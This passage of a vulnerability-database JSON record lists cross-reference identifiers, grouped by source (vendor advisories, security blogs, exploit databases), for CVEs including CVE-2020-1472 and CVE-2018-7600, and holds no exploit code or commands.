"QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:DEB92D82F8384860B06735A45F20B980"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", "idList": ["SAINT:17FB524069BA3CD18537B30C76190BF7", "SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", 
"SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", 
"idList": ["SSV:97207", "SSV:99260"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-106914", "SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D6DE736915C69A194D894AE9BED7EC57", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:43A16BBDCD3B020E360EE37C48B44088", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "THN:582576397E2C98200C7C952401392B5B", "THN:603F844B99A1CC0CF1DE580659626B57", "THN:6ED39786EE29904C7E93F7A0E35A39CB", 
"THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:7FD924637D99697D78D53283817508DA", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:97FD375C23B4E7C3F13B9F3907873671", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:A30AE10A13D33189456EB192DDF2B8C2", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:D0592A04885C26716DF385AE8ABF8401", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:DADA9CB340C28F942D085928B22B103F", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F2A3695D04A2484E069AC407E754A9C1", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "THN:F8EDB5227B5DA0E4B49064C2972A193D", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", 
"THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", 
"THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", 
"THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:33E56DEB736406F9DD08C7533BF1812B", "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:3661EA0D8FCA17978A471DB91405999A", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", 
"THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", 
"THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600", "UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "vmware", "idList": ["VMSA-2021-0010"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33951", "1337DAY-ID-34553", "1337DAY-ID-35274", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36564"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:C94508071E81EBFE1BF46F3EF3E4EDD3", "0DAYDB:E60701732169ACBFC7A4C97688260000"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-201804-1", "ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", 
"AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:AF37CD6E-8730-4AEF-8679-0413B491A107", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:421280", "VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1565", "CPAI-2017-1009", "CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-0860", "CPAI-2019-1653", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0100", "CPAI-2021-0107", "CPAI-2021-0376"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", 
"CVE-2020-0787"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:E895C", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DSA-4156-1:C1814"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:49071"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:643750D6FF631053256ACECA930FF041"]}, {"type": "f5", "idList": ["F5:K22854260"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:38D8230C58CD", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4A64830CFCDC", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", 
